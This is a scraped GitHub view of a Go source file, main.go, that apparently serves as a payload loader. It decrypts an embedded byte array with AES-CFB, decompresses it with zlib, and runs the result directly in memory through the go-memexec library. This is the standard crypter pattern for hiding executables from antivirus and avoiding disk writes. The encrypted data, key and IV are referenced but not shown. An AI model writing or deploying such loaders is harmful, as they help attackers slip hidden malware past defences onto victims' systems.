-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmain.go
85 lines (67 loc) · 1.47 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
package main
import (
"bytes"
"compress/zlib"
"crypto/aes"
"crypto/cipher"
"fmt"
"github.com/amenzhinsky/go-memexec"
"io/ioutil"
)
// decompress function
func decompress(input []byte) []byte {
// read in the compressed data...
r, err := zlib.NewReader(bytes.NewReader(input))
if err != nil{
fmt.Println("[-] zlib.NewReader() Error: ", err)
}
bite, err := ioutil.ReadAll(r)
if err != nil{
fmt.Println("[-] ioutil.ReadAll() Error: ", err)
}
return bite
}
// decryption function
func decrypt() []byte {
// creating unencrypted binary array
unencbin := make([]byte, len(data))
// creating cipher block
b, err := aes.NewCipher(key)
if err != nil{
fmt.Println("[-] aes.NewCipher() Error: ", err)
}
// creating stream cipher
asd := cipher.NewCFBDecrypter(b, iv)
// decrypting
asd.XORKeyStream(unencbin, data)
return unencbin
}
// execute function
func execute(execfile []byte){
// create memory execution object
exe, err := memexec.New(execfile)
if err != nil {
fmt.Println("[-] memexec.New() Error: ", err)
}
defer exe.Close()
// prep execute
r := exe.Command()
// execute
b, err := r.CombinedOutput()
if err != nil {
fmt.Println("[-] r.CombinedOutput() Error: ", err)
} else {
fmt.Println("[+] Executable ran")
}
// print any output
fmt.Println(string(b))
}
// main function
func main() {
// decrypt binary
unencrypted := decrypt()
// decompress binary
decompressed := decompress(unencrypted)
// execute binary
execute(decompressed)
}